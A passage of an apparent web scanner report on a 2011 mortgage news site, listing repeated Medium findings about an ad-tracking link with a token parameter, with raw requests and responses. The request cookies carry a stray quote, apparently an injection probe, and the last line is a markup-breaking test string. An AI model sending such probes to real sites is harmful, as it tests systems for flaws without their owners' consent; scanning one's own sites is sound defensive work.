User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.50. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:23 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.51. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:08 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.52. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:02 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.53. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:49 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.54. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:47 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.55. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:44 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.56. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.57. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:31 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.58. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.59. http://mortgage.ocregister.com/2011/02/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/02/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.60. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:06:36 +0000
Cache-Control: max-age=252, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 83211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.61. http://mortgage.ocregister.com/feeda71cd">